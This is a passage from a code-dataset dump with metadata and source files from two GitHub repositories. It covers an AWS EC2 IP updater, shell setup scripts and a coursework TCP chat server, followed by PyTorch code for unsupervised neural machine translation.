134, "path": "/EC2_parcer/cluster-ip-discovery/updater.py", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# install aws-cli and enter credentials\n\nimport boto3\nimport yaml\nfrom collections import defaultdict\n\n\nclass AWS():\n\n def __init__(self):\n self.ec2 = boto3.resource('ec2')\n self.ec2info = self.get_ec2info()\n\n def get_ec2info(self):\n ec2info = defaultdict()\n running_ec2_instances = self.ec2.instances.filter(\n Filters=[{\n 'Name': 'instance-state-name',\n 'Values': ['running']\n }])\n for instance in running_ec2_instances:\n for tag in instance.tags:\n if 'Name' in tag['Key']:\n name = tag['Value']\n ec2info[instance.id] = {\n \"Name\": name,\n \"Type\": instance.instance_type,\n \"State\": instance.state[\"Name\"],\n \"Public-IP\": instance.public_ip_address,\n \"Internal-IP\": instance.private_ip_address}\n return ec2info\n\n # def print_all_instances(self):\n # print(\"=> Getting all ec2 instances\")\n # for instance_id, instance in self.ec2info.items():\n # print(instance_id)\n # for k, v in instance.items():\n # print(\"{0}: {1}\".format(k, v))\n #\n # def print_jumphosts(self):\n # print(\"=> Searching for ec2 instances with public IP\")\n # for instance_id, instance in self.ec2info.items():\n # if not instance.get(\"Public-IP\") == None:\n # for k, v in instance.items():\n # print(\"{0}: {1}\".format(k, v))\n\n def find_cluster_instances(self, names):\n cluster_info = defaultdict()\n for name in names:\n print(\"=> Searching for : {}\".format(name))\n for instance_id, instance in self.ec2info.items():\n if instance[\"Name\"] == name:\n cluster_info[instance_id] = {\n \"Name\": name,\n \"Internal-IP\": instance[\"Internal-IP\"],\n \"Public-IP\": instance[\"Public-IP\"]}\n return cluster_info\n\n\nclass Cluster:\n\n def __init__(self, file):\n self.file = file\n self.config = self.parse_config()\n self.name = self.config[\"SSH\"][\"jump_host\"][\"name\"]\n self.search_instances = self.get_instances_names_for_cluster()\n self.info = defaultdict()\n\n def get_instances_names_for_cluster(self):\n if self.name == 'qa-0':\n search_instanses = ['QA-0-Core-SDP-QA', 'QA-0-Core-k8s-NGP-QA']\n elif self.name == 'qa-1':\n search_instanses = ['QA-1-Core-SDP-QA', 'QA-1-Core-k8s-NGP-QA']\n elif self.name == 'qa-2':\n search_instanses = ['QA-2-Core-SDP-QA', 'QA-2-Core-k8s-NGP-QA']\n elif self.name == 'qa-4':\n search_instanses = ['QA-4-Core-SDP-Dev', 'QA-4-Core-k8s-NGP-Dev']\n return search_instanses\n\n def parse_config(self):\n with open(self.file, 'r') as stream:\n try:\n yaml_file = yaml.safe_load(stream)\n return yaml_file\n except yaml.YAMLError as exc:\n print(exc)\n return None\n\n def update_config(self):\n print(\"=> Updating {} config\".format(self.name))\n core_internal_ip = []\n jumphost_public_ip = self.config[\"SSH\"][\"jump_host\"][\"ip\"]\n\n for cluster_name, cluster_info in self.info.items():\n if cluster_info[\"Public-IP\"]:\n jumphost_public_ip = cluster_info[\"Public-IP\"]\n else:\n core_internal_ip.append(cluster_info[\"Internal-IP\"])\n\n if self.config[\"SSH\"][\"jump_host\"][\"ip\"] != jumphost_public_ip:\n print(\"=> Changing Jumphost IP to {}\".format(jumphost_public_ip))\n self.config[\"SSH\"][\"jump_host\"][\"ip\"] = jumphost_public_ip\n\n if core_internal_ip != self.config[\"SSH\"][\"core\"][\"ips\"]:\n print(\"=> Changing Core IPs to:\")\n print(core_internal_ip)\n self.config[\"SSH\"][\"core\"][\"ips\"] = core_internal_ip\n\n stream = open(self.file, 'w')\n yaml.safe_dump(self.config, stream, default_flow_style=False)\n\n def print_config(self, *args):\n print(self.name)\n print(self.info)\n\n def print_info(self):\n for cluster_name, cluster_info in self.info.items():\n for k, v in cluster_info.items():\n print(\"{0}: {1}\".format(k, v))\n\n\ndef main():\n\n # Change Cluster.get_instances_names_for_cluster if instances names in AWS changed.\n\n aws = AWS()\n cluster = Cluster('config-cluster.yaml')\n cluster.info = aws.find_cluster_instances(cluster.search_instances)\n cluster.update_config()\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6333333253860474, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 19, "blob_id": "411486a6a55a83f9ebde0f6488bcd157c51e8cda", "content_id": "131e4f91deeca4e725000156a644332b036600d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 120, "license_type": "no_license", "max_line_length": 40, "num_lines": 6, "path": "/bash/myenv/Vm-env/user-env/bash.sh", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho \"Source path:\" $1\necho \"==> Copying bashrc\"\ncp ${1}/Vm-env/configs/.bashrc ~/.bashrc\nsource ~/.bashrc\n" }, { "alpha_fraction": 0.6203252077102661, "alphanum_fraction": 0.624119222164154, "avg_line_length": 32.85321044921875, "blob_id": "11756ddbfb598090b568d381ff8475607f9ce16f", "content_id": "8d71dd1332c82782154e1c627dba02aab2810c24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4269, "license_type": "no_license", "max_line_length": 267, "num_lines": 109, "path": "/tcp_server/tcp_server/new_TCP_server.py", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "import socket\nimport socketserver\nimport json\nfrom ast import literal_eval\n\n\"\"\" \nПервое приложение (сервер)\nСоздать многопоточный TCP-сервер со следующим функционалом: \n– фиксировать все попытки входящих соединений со стороны клиентов\n– сервер должен идентифицировать клиента по его ip-адресу и сопоставлять с ним имя (к клиенту в дальнейшем можно обращаться по имени или по ip-адресу)\n– организовать постоянный приём и отсылку сообщений от клиентов (каждый клиент должен иметь возможность отправить любому другому присоединенному к серверу клиенту сообщение), сообщения оформляются как команды с помощью JSON, формат команд согласовать с преподавателем\n– по требованию клиента сервер должен выдавать список всех присоединенных к нему клиентов (список оформляется с помощью JSON)\n\"\"\"\n\n\nclass ClientBase:\n\n def __init__(self):\n self.base = {}\n self.clients = []\n\n def add_client(self, ip, port):\n cl = self.get_client(ip)\n if cl is None:\n name = 'user_{}'.format(len(self.clients) + 1)\n new_client = Client(name, ip, port)\n self.clients.append(new_client)\n return new_client\n else:\n return cl\n\n def get_users_json(self):\n for cl in self.clients:\n self.base[cl.name] = cl.ip\n return json.dumps(self.base, indent=4, sort_keys=True)\n\n def get_client(self, param):\n for cl in self.clients:\n if cl.ip == param:\n return cl\n if cl.name == param:\n return cl\n return None\n\n\nclass Client:\n\n def __init__(self, name, ip, port):\n self.ip = ip\n self.name = name\n self.port = port\n\n def __repr__(self):\n return \"Name: {}\\nIP: {}\\nPort: {}\".format(self.name, self.ip, self.port)\n\n\nclass MyTCPHandler(socketserver.BaseRequestHandler):\n\n def __init__(self, request, client_address, server):\n\n self.clients_base = ClientBase()\n super().__init__(request, client_address, server)\n\n def handle(self):\n data = self.request.recv(1024).strip()\n data_dict = literal_eval(data.decode())\n\n ip, port = self.client_address\n client = self.clients_base.add_client(ip, port)\n print(\"\\nConnected -> User: {}, IP: {}\".format(client.name, client.ip))\n print('Data received: {}'.format(data_dict))\n\n response = self.process_request(data_dict)\n if self.clients_base.get_client(data_dict['send_to']):\n self.send_to_other_client(client, response)\n\n self.request.sendall(response)\n\n def process_request(self, data):\n if data['command'] == 'get_users':\n response = str(self.get_users_json())\n else:\n response = data['command']\n return bytes(response + \"\\n\", \"utf-8\")\n\n def send_to_other_client(self, client, response):\n try:\n print(\"Sending {} to {}\".format(response, client))\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n sock.connect((client.ip, client.port))\n sock.sendall(bytes(response, \"utf-8\"))\n except ConnectionRefusedError as err:\n print('Connection refused by server. {}'.format(err))\n\n def get_users_json(self):\n print(self.clients_base.get_users_json())\n return self.clients_base.get_users_json()\n\n\nif __name__ == '__main__':\n\n HOST = '0.0.0.0'\n PORT = 80\n\n with socketserver.TCPServer((HOST, PORT), MyTCPHandler) as server:\n print('Server listening on {}:{}'.format(HOST, PORT))\n # Activate the server; this will keep running until you\n # interrupt the program with Ctrl-C\n server.serve_forever()\n" }, { "alpha_fraction": 0.6065573692321777, "alphanum_fraction": 0.6065573692321777, "avg_line_length": 14, "blob_id": "0c78edb9839288f9d9e1e1ca2565876e6ab05951", "content_id": "b5135807e3149099c5f1c8b20b9524d894552571", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 61, "license_type": "no_license", "max_line_length": 43, "num_lines": 4, "path": "/bash/myenv/Vm-env/user-env/echo.sh", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho \"echo.sh works! Current dir : \"$PWD\" \"\nls\n\n" }, { "alpha_fraction": 0.6438356041908264, "alphanum_fraction": 0.6438356041908264, "avg_line_length": 11, "blob_id": "934853eff723ee1e03cfd9dd3f6e35f322b37e44", "content_id": "a372d0d5f6ad46aafd63209015bf72734e063597", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 73, "license_type": "no_license", "max_line_length": 27, "num_lines": 6, "path": "/Makefile", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "\nhelp:\n\t@echo 'Usage:'\n\nssh-gen:\n\t$(value my_important_task)\n\t.ONESHELL:\n" }, { "alpha_fraction": 0.6899350881576538, "alphanum_fraction": 0.6948052048683167, "avg_line_length": 24.66666603088379, "blob_id": "d42c5852eb845a027cc9ca53f3dc948bd9855e32", "content_id": "aae5ed22597f36a808730a5270021065f4e9c956", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 616, "license_type": "no_license", "max_line_length": 84, "num_lines": 24, "path": "/bash/myenv/Vm-env/user-env/vim.sh", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nVIM=$(command -v vim) #Checking if vim exists on system\nGIT=$(command -v vim) \n\nif [ ! -f \"$VIM\" ]; then\n echo \"Vim not installed\"\n #sudo yum -y install vim\n exit 1\nfi\n\nif [ ! -f \"$GIT\" ]; then\n echo \"Git not installed\"\n #sudo yum -y install git\n exit 1\nfi\n\necho \"=> Installing vundlevim and plugins\"\nsudo cp . configs/.vimrc ~/.vimrc\nsudo mkdir -p ~/.vim/colors/\nsudo git clone https://github.com/VundleVim/Vundle.vim.git ~/.vim/bundle/Vundle.vim\nsudo wget https://raw.githubusercontent.com/w0ng/vim-hybrid/master/colors/hybrid.vim\nsudo mv hybrid.vim ~/.vim/colors/\nsudo vim +PluginInstall +qall\n" } ]
18
Visonew/unsupervised_mt
https://github.com/Visonew/unsupervised_mt
ff2e93ec6efeb8518f160fbb532a648426b30374
2bd406e283c0cfaed5fd82a0904c7a911aa3d3f9
7d9493651717ac4d32ce21e21a6ff3acde981b08
refs/heads/master
2021-10-24T11:26:15.317361
2019-03-25T15:35:32
2019-03-25T15:35:32
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6140455007553101, "alphanum_fraction": 0.6234012246131897, "avg_line_length": 40.39215850830078, "blob_id": "a73f96bb7936ddf80336794892b6bb6d14d14d92", "content_id": "62fe898be39319b7d0c17bfad9311627aed14d76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8444, "license_type": "no_license", "max_line_length": 122, "num_lines": 204, "path": "/unsupervised_mt/models.py", "repo_name": "Visonew/unsupervised_mt", "src_encoding": "UTF-8", "text": "import numpy as np\nimport torch\nimport torch.nn as nn\n\n\ndef identity(input):\n return input\n\n\nclass Embedding(nn.Module):\n def __init__(self, emb_matrix, requires_grad=True):\n super(Embedding, self).__init__()\n self.embedding = nn.Embedding.from_pretrained(torch.from_numpy(emb_matrix), freeze=not requires_grad)\n self.vocab_size = self.embedding.num_embeddings\n self.embedding_dim = self.embedding.embedding_dim\n\n def forward(self, input):\n return self.embedding(input)\n\n\nclass Encoder(nn.Module):\n def __init__(self, embedding: Embedding, rnn):\n super(Encoder, self).__init__()\n assert embedding.embedding_dim == rnn.input_size\n\n self.embedding = embedding\n self.embedding_dim = embedding.embedding_dim\n self.rnn = rnn\n self.hidden_size = rnn.hidden_size\n\n def forward(self, inputs):\n \"\"\"\n inputs: length x batch_size\n outputs: length x batch_size x hidden_size\n hidden: n_layers x batch_size x hidden_size\n \"\"\"\n outputs, hidden = self.rnn(self.embedding(inputs))\n return outputs, hidden\n\n\nclass DecoderHat(nn.Module):\n def __init__(self, hidden_size, vocab_size, bidirectional=True):\n super(DecoderHat, self).__init__()\n self.hidden_size = 2 * hidden_size if bidirectional else hidden_size\n self.vocab_size = vocab_size\n self.linear = nn.Linear(self.hidden_size, vocab_size)\n self.softmax = nn.LogSoftmax(dim=-1)\n\n def forward(self, input):\n return self.softmax(self.linear(input))\n\n\nclass Attention(nn.Module):\n def __init__(self, embedding_dim, hidden_size, max_length, bidirectional=True):\n \"\"\"\n input: batch_size x vocab_size\n hidden: (1 or 2)*n_layers x batch_size x hidden_size\n encoder_outputs: length (<= max_length) x batch_size x (1 or 2)*hidden_size\n attn_weights: batch_size x 1 x max_length\n attn_applied: batch_size x 1 x (1 or 2)*hidden_size\n\n See figure from https://pytorch.org/tutorials/intermediate/seq2seq_translation_tutorial.html\n \"\"\"\n super(Attention, self).__init__()\n self.embedding_dim = embedding_dim\n self.hidden_size = hidden_size\n self.max_length = max_length\n self.bidirectional = bidirectional\n\n if self.bidirectional:\n self.attn = nn.Linear(2 * self.hidden_size + self.embedding_dim, self.max_length, bias=False)\n self.attn_combine = nn.Linear(self.embedding_dim + 2 * self.hidden_size, self.embedding_dim, bias=False)\n else:\n self.attn = nn.Linear(self.hidden_size + self.embedding_dim, self.max_length, bias=False)\n self.attn_combine = nn.Linear(self.embedding_dim + self.hidden_size, self.embedding_dim, bias=False)\n self.attn_softmax = nn.Softmax(dim=-1)\n self.attn_relu = nn.ReLU()\n\n def forward(self, embedded, hidden, encoder_outputs):\n if self.bidirectional:\n attn_weights = self.attn_softmax(self.attn(torch.cat((hidden[-2], hidden[-1], embedded), dim=1))).unsqueeze(1)\n else:\n attn_weights = self.attn_softmax(self.attn(torch.cat((hidden[-1], embedded), dim=1))).unsqueeze(1)\n length = encoder_outputs.size(0)\n attn_applied = torch.bmm(attn_weights[:, :, :length], encoder_outputs.transpose(0, 1))\n return self.attn_relu(self.attn_combine(torch.cat((embedded, attn_applied.squeeze(1)), dim=1)))\n\n\nclass Decoder(nn.Module):\n def __init__(self, embedding: Embedding, attention, rnn, hat: DecoderHat, use_cuda=False):\n super(Decoder, self).__init__()\n assert embedding.embedding_dim == rnn.input_size and \\\n embedding.vocab_size == hat.vocab_size and \\\n attention.embedding_dim == embedding.embedding_dim and \\\n hat.hidden_size == (rnn.bidirectional + 1) * rnn.hidden_size\n\n self.embedding = embedding\n self.embedding_dim = embedding.embedding_dim\n self.attention = attention\n self.rnn = rnn\n self.hidden_size = rnn.hidden_size\n self.hat = hat\n self.use_cuda = use_cuda\n\n def step(self, input, hidden, encoder_outputs):\n \"\"\"\n input: batch_size\n hidden: (1 or 2)*n_layers x batch_size x hidden_size\n encoder_outputs: max_length (<= max_length) x batch_size x (1 or 2)*hidden_size\n embedded: batch_size x embedding_dim\n rnn_input: batch_size x embedding_dim\n output: 1 x batch_size x (1 or 2)*hidden_size\n \"\"\"\n embedded = self.embedding(input)\n rnn_input = self.attention(embedded, hidden, encoder_outputs) if self.attention else embedded\n output, hidden = self.rnn(rnn_input.unsqueeze(0), hidden)\n output = self.hat(output.squeeze(0))\n return output, hidden\n\n def init_input(self, batch_size, sos_index):\n initial_input = torch.full((batch_size,), sos_index, dtype=torch.long)\n initial_input = initial_input.cuda() if self.use_cuda else initial_input\n return initial_input\n\n def forward(self, hidden, encoder_outputs, sos_index,\n targets, teacher_forcing_ratio=0.5):\n \"\"\"\n targets: target_length x batch_size\n \"\"\"\n input = self.init_input(encoder_outputs.size(1), sos_index)\n outputs = []\n for t in range(targets.size(0)):\n output, hidden = self.step(input, hidden, encoder_outputs)\n outputs.append(output.unsqueeze(0))\n if np.random.binomial(1, teacher_forcing_ratio):\n input = targets[t]\n else:\n input = torch.topk(output, k=1)[1].squeeze(-1)\n\n return torch.cat(outputs)\n\n def evaluate(self, hidden, encoder_outputs, sos_index, eos_index, n_iters=None):\n \"\"\"\n hidden: n_layers x batch_size x (1 or 2)*hidden_size\n encoder_outputs: length x batch_size x (1 or 2)*hidden_size\n input: batch_size\n \"\"\"\n input = self.init_input(hidden.size(1), sos_index)\n outputs = []\n ended = np.zeros(hidden.size(1))\n while ~np.all(ended) and n_iters != 0:\n output, hidden = self.step(input, hidden, encoder_outputs)\n outputs.append(output.unsqueeze(0))\n input = torch.topk(output, k=1)[1].squeeze(-1)\n ended += (input == eos_index).cpu().numpy() if self.use_cuda else (input == eos_index).numpy()\n if n_iters is not None:\n n_iters -= 1\n\n return torch.cat(outputs)\n\n\nclass Seq2Seq(nn.Module):\n def __init__(self, encoder_embedding: Embedding, encoder_rnn,\n decoder_embedding: Embedding, attention, decoder_rnn, decoder_hat: DecoderHat,\n use_cuda=False):\n super(Seq2Seq, self).__init__()\n assert encoder_rnn.hidden_size == decoder_rnn.hidden_size and \\\n encoder_rnn.num_layers == decoder_rnn.num_layers and \\\n encoder_rnn.bidirectional == decoder_rnn.bidirectional\n\n self.encoder = Encoder(encoder_embedding, encoder_rnn)\n self.decoder = Decoder(decoder_embedding, attention, decoder_rnn, decoder_hat, use_cuda)\n\n def forward(self, inputs, sos_index, targets, teacher_forcing_ratio=0.5):\n encoder_outputs, hidden = self.encoder(inputs)\n decoder_outputs = self.decoder(hidden, encoder_outputs, sos_index, targets, teacher_forcing_ratio)\n return decoder_outputs, encoder_outputs\n\n def evaluate(self, inputs, sos_index, eos_index, n_iters=None):\n encoder_outputs, hidden = self.encoder(inputs)\n decoder_outputs = self.decoder.evaluate(hidden, encoder_outputs, sos_index, eos_index, n_iters)\n return decoder_outputs\n\n\nclass Discriminator(nn.Module):\n def __init__(self, hidden_size, bidirectional):\n super(Discriminator, self).__init__()\n self.hidden_size = 2 * hidden_size if bidirectional else hidden_size\n self.bidirectional = bidirectional\n\n self.layers = nn.Sequential(\n nn.Linear(self.hidden_size, 100), nn.ReLU(),\n nn.Linear(100, 10), nn.ReLU(),\n nn.Linear(10, 1)\n )\n\n def forward(self, encoder_outputs):\n if self.bidirectional:\n hidden = torch.cat((encoder_outputs[-1, :, :self.hidden_size // 2],\n encoder_outputs[0, :, self.hidden_size // 2:]), dim=-1)\n else:\n hidden = encoder_outputs[-1]\n\n return self.layers(hidden)\n" }, { "alpha_fraction": 0.6039456129074097, "alphanum_fraction": 0.6156030297279358, "avg_line_length": 47.766422271728516, "blob_id": "258f45bb149da1bd3e2dd8d4eac57e011eac2177", "content_id": "8ed7b74f8ba2e9c7273fc2679c62f423d5176443", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6691, "license_type": "no_license", "max_line_length": 116, "num_lines": 137, "path": "/unsupervised_mt/train.py", "repo_name": "Visonew/unsupervised_mt", "src_encoding": "UTF-8", "text": "from unsupervised_mt.models import Embedding, Encoder, DecoderHat, \\\n Decoder, Seq2Seq, Discriminator, Attention, identity\nfrom unsupervised_mt.losses import translation_loss, classification_loss\nfrom unsupervised_mt.utils import noise, log_probs2indices\n\nimport torch\nimport torch.nn as nn\nfrom torch.optim import SGD\n\n\nclass Trainer:\n def __init__(self, frozen_src2tgt: Seq2Seq, frozen_tgt2src: Seq2Seq,\n src_embedding: Embedding, tgt_embedding: Embedding,\n encoder_rnn, decoder_rnn, attention: Attention,\n src_hat: DecoderHat, tgt_hat: DecoderHat, discriminator: Discriminator,\n src_sos_index, tgt_sos_index, src_eos_index, tgt_eos_index, src_pad_index, tgt_pad_index,\n device, lr_core=1e-3, lr_disc=1e-3):\n assert discriminator.hidden_size == (encoder_rnn.bidirectional + 1) * encoder_rnn.hidden_size\n\n self.frozen_src2tgt = frozen_src2tgt\n self.frozen_tgt2src = frozen_tgt2src\n self.src_embedding = src_embedding\n self.tgt_embedding = tgt_embedding\n self.encoder_rnn = encoder_rnn\n self.decoder_rnn = decoder_rnn\n self.attention = attention\n self.src_hat = src_hat\n self.tgt_hat = tgt_hat\n self.core_model = nn.ModuleList([\n self.src_embedding,\tself.tgt_embedding, self.encoder_rnn, self.decoder_rnn,\n self.attention, self.src_hat, self.tgt_hat\n ])\n self.discriminator = discriminator\n self.src_sos_index = src_sos_index\n self.tgt_sos_index = tgt_sos_index\n self.src_eos_index = src_eos_index\n self.tgt_eos_index = tgt_eos_index\n self.src_pad_index = src_pad_index\n self.tgt_pad_index = tgt_pad_index\n self.device = device\n\n self.core_model.to(device)\n self.discriminator.to(device)\n\n use_cuda = device.type == 'cuda'\n self.src2src = Seq2Seq(src_embedding, encoder_rnn, src_embedding, attention, decoder_rnn, src_hat, use_cuda)\n self.src2tgt = Seq2Seq(src_embedding, encoder_rnn, tgt_embedding, attention, decoder_rnn, tgt_hat, use_cuda)\n self.tgt2tgt = Seq2Seq(tgt_embedding, encoder_rnn, tgt_embedding, attention, decoder_rnn, tgt_hat, use_cuda)\n self.tgt2src = Seq2Seq(tgt_embedding, encoder_rnn, src_embedding, attention, decoder_rnn, src_hat, use_cuda)\n\n self.core_optimizer = SGD(self.core_model.parameters(), lr=lr_core)\n self.discriminator_optimizer = SGD(self.discriminator.parameters(), lr=lr_disc)\n\n def train_step(self, batch, weights=(1, 1, 1), drop_probability=0.1, permutation_constraint=3):\n batch = {l: t.to(self.device) for l, t in batch.items()}\n\n src2src_dec, src2src_enc = self.src2src(\n noise(batch['src'], self.src_pad_index, drop_probability, permutation_constraint),\n self.src_sos_index, batch['src']\n )\n tgt2tgt_dec, tgt2tgt_enc = self.tgt2tgt(\n noise(batch['tgt'], self.tgt_pad_index, drop_probability, permutation_constraint),\n self.tgt_sos_index, batch['tgt']\n )\n tgt2src_dec, tgt2src_enc = self.tgt2src(\n noise(self.frozen_src2tgt(batch['src']), self.tgt_pad_index, drop_probability, permutation_constraint),\n self.src_sos_index, batch['src']\n )\n src2tgt_dec, src2tgt_enc = self.src2tgt(\n noise(self.frozen_tgt2src(batch['tgt']), self.src_pad_index, drop_probability, permutation_constraint),\n self.tgt_sos_index, batch['tgt']\n )\n\n # autoencoding\n core_loss = weights[0] * (\n translation_loss(src2src_dec, batch['src']) +\n translation_loss(tgt2tgt_dec, batch['tgt'])\n )\n\n # translating\n core_loss += weights[1] * (\n translation_loss(tgt2src_dec, batch['src']) +\n translation_loss(src2tgt_dec, batch['tgt'])\n )\n\n # beating discriminator\n core_loss += weights[2] * (\n classification_loss(self.discriminator(src2src_enc), 'tgt') +\n classification_loss(self.discriminator(tgt2tgt_enc), 'src') +\n classification_loss(self.discriminator(tgt2src_enc), 'src') +\n classification_loss(self.discriminator(src2tgt_enc), 'tgt')\n )\n\n # update core model's parameters\n self.core_optimizer.zero_grad()\n core_loss.backward(retain_graph=True)\n self.core_optimizer.step()\n\n # training discriminator\n discriminator_loss = \\\n classification_loss(self.discriminator(src2src_enc.detach()), 'src') + \\\n classification_loss(self.discriminator(tgt2tgt_enc.detach()), 'tgt') + \\\n classification_loss(self.discriminator(tgt2src_enc.detach()), 'tgt') + \\\n classification_loss(self.discriminator(src2tgt_enc.detach()), 'src')\n\n # update discriminator parameters\n self.discriminator_optimizer.zero_grad()\n discriminator_loss.backward()\n self.discriminator_optimizer.step()\n\n return core_loss.item(), discriminator_loss.item()\n\n def load(self, directory):\n for layer, name in [(self.__getattribute__(name), name)\n for name in ['src_embedding', 'tgt_embedding', 'encoder_rnn', 'decoder_rnn',\n 'attention', 'src_hat', 'tgt_hat', 'discriminator']]:\n layer.load_state_dict(torch.load(directory + name))\n\n def save(self, directory):\n for layer, name in [(self.__getattribute__(name), name)\n for name in ['src_embedding', 'tgt_embedding', 'encoder_rnn', 'decoder_rnn',\n 'attention', 'src_hat', 'tgt_hat', 'discriminator']]:\n torch.save(layer.state_dict(), directory + name)\n\n def predict(self, batch, l1='src', l2='tgt', n_iters=None):\n model = {('src', 'src'): self.src2src, ('src', 'tgt'): self.src2tgt,\n ('tgt', 'src'): self.tgt2src, ('tgt', 'tgt'): self.tgt2tgt}[(l1, l2)]\n sos_index, eos_index = (self.src_sos_index, self.src_eos_index) if l2 == 'src' \\\n else (self.tgt_sos_index, self.tgt_eos_index)\n return log_probs2indices(model.evaluate(batch.to(self.device), sos_index, eos_index, n_iters=n_iters))\n\n def predict_on_test(self, batch_iter, batch_size, visualize, l1='src', l2='tgt', n_iters=None):\n predict = []\n for i in range(0, len(batch_iter.test_ids), batch_size):\n batch = batch_iter.load_batch(0, test=True, ids=batch_iter.test_ids[i:i + batch_size])[l1]\n predict += visualize(self.predict(batch, l1=l1, l2=l2, n_iters=n_iters), l2)\n return predict\n\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6652601957321167, "alphanum_fraction": 0.6793248653411865, "avg_line_length": 39.056339263916016, "blob_id": "c9afffd744bf909325669eb795f5c1b8d99d5855", "content_id": "a15dbfff434901a0fb71958f090129d144976a81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2844, "license_type": "no_license", "max_line_length": 109, "num_lines": 71, "path": "/unsupervised_mt/main.py", "repo_name": "Visonew/unsupervised_mt", "src_encoding": "UTF-8", "text": "from unsupervised_mt.dataset import Dataset\nfrom unsupervised_mt.train import Trainer\nfrom unsupervised_mt.models import Embedding, DecoderHat, Attention, Discriminator\nfrom unsupervised_mt.batch_loader import BatchLoader\nfrom unsupervised_mt.utils import log_probs2indices, noise\n\nimport io\nfrom functools import partial\nimport torch\nimport torch.nn as nn\nfrom tqdm import tqdm\n\n# device\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint('device is {}'.format(device))\n\n# dataset\nds = Dataset(corp_paths=('../data/train.lc.norm.tok.en', '../data/train.lc.norm.tok.fr'),\n emb_paths=('../data/wiki.multi.en.vec', '../data/wiki.multi.fr.vec'),\n pairs_paths=('../data/train_test_src2tgt.npy', '../data/train_test_tgt2src.npy'),\n max_length=20, test_size=0.1)\nprint('finish loading dataset')\n\n# batch iterator\nbatch_iter = BatchLoader(ds)\n\n# models\nhidden_size = 300\nnum_layers = 3\n\nsrc_embedding = Embedding(ds.emb_matrix['src']).to(device)\ntgt_embedding = Embedding(ds.emb_matrix['tgt']).to(device)\nencoder_rnn = nn.GRU(input_size=src_embedding.embedding_dim, hidden_size=hidden_size, num_layers=num_layers,\n bidirectional=True)\ndecoder_rnn = nn.GRU(input_size=src_embedding.embedding_dim, hidden_size=hidden_size, num_layers=num_layers,\n bidirectional=True)\nattention = Attention(src_embedding.embedding_dim, hidden_size, max_length=ds.max_length, bidirectional=True)\nsrc_hat = DecoderHat(2 * hidden_size, ds.vocabs['src'].size)\ntgt_hat = DecoderHat(2 * hidden_size, ds.vocabs['tgt'].size)\ndiscriminator = Discriminator(2 * hidden_size)\n\n# trainer\ntrainer = Trainer(partial(ds.translate_batch_word_by_word, l1='src', l2='tgt'),\n partial(ds.translate_batch_word_by_word, l1='tgt', l2='src'),\n src_embedding, tgt_embedding, encoder_rnn, decoder_rnn, attention, src_hat, tgt_hat,\n discriminator,\n ds.get_sos_index('src'), ds.get_sos_index('tgt'),\n ds.get_eos_index('src'), ds.get_eos_index('tgt'),\n ds.get_pad_index('src'), ds.get_pad_index('tgt'),\n device, lr_core=1e-3, lr_disc=1e-3)\n#trainer.load('../saved_models/final_result1/')\nprint('finish initializing models')\n\n# training\nbatch_size = 30\nnum_steps = 50000\n\ncore_losses = []\ndisc_losses = []\nfor i in tqdm(range(num_steps)):\n core_loss, disc_loss = trainer.train_step(batch_iter.load_batch(batch_size), weights=(1, 1, 1))\n core_losses.append(core_loss)\n disc_losses.append(disc_loss)\n\ntrainer.save('../saved_models/hidden_300/')\n\n# predict\n#predictions = trainer.predict_on_test(batch_iter, batch_size=50, visualize=ds.visualize_batch, n_iters=30)\n#with io.open('predictions', 'w') as f:\n# print(*predictions, sep='\\n', file=f)\n#print('finish predicting')\n" }, { "alpha_fraction": 0.6712132096290588, "alphanum_fraction": 0.6726489663124084, "avg_line_length": 45.266666412353516, "blob_id": "09f2beced129715ad998615eab9aa06d39ad72d7", "content_id": "32f0316b917db46c313f06113282a71f57bf224b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1393, "license_type": "no_license", "max_line_length": 120, "num_lines": 30, "path": "/unsupervised_mt/batch_loader.py", "repo_name": "Visonew/unsupervised_mt", "src_encoding": "UTF-8", "text": "import numpy as np\nimport torch\nfrom unsupervised_mt.utils import pad_monolingual_batch\n\n\nclass BatchLoader:\n def __init__(self, dataset):\n self.languages = dataset.languages\n self.load_sentence = dataset.load_sentence\n self.train_ids = {l: np.arange(len(dataset.train[l])) for l in self.languages}\n self.test_ids = np.arange(len(dataset.test))\n self.pad_index = {l: dataset.vocabs[l].get_pad(l) for l in self.languages}\n\n def load_raw_monolingual_batch(self, batch_size, language, random_state=None, test=False, ids=None):\n if random_state is not None:\n np.random.seed(random_state)\n\n if ids is None:\n ids = np.random.choice(self.test_ids if test else self.train_ids[language], size=batch_size)\n\n return [self.load_sentence(language, idx, test=test) for idx in ids]\n\n def load_monolingual_batch(self, batch_size, language, random_state=None, test=False, ids=None):\n return torch.tensor(pad_monolingual_batch(\n self.load_raw_monolingual_batch(batch_size, language, random_state, test=test, ids=ids),\n self.pad_index[language]\n ), dtype=torch.long).transpose(0, 1)\n\n def load_batch(self, batch_size, random_state=None, test=False, ids=None):\n return {l: self.load_monolingual_batch(batch_size, l, random_state, test=test, ids=ids) for l in self.languages}\n\n\n\n\n\n" }, { "alpha_fraction": 0.7222222089767456, "alphanum_fraction": 0.7936508059501648, "avg_line_length": 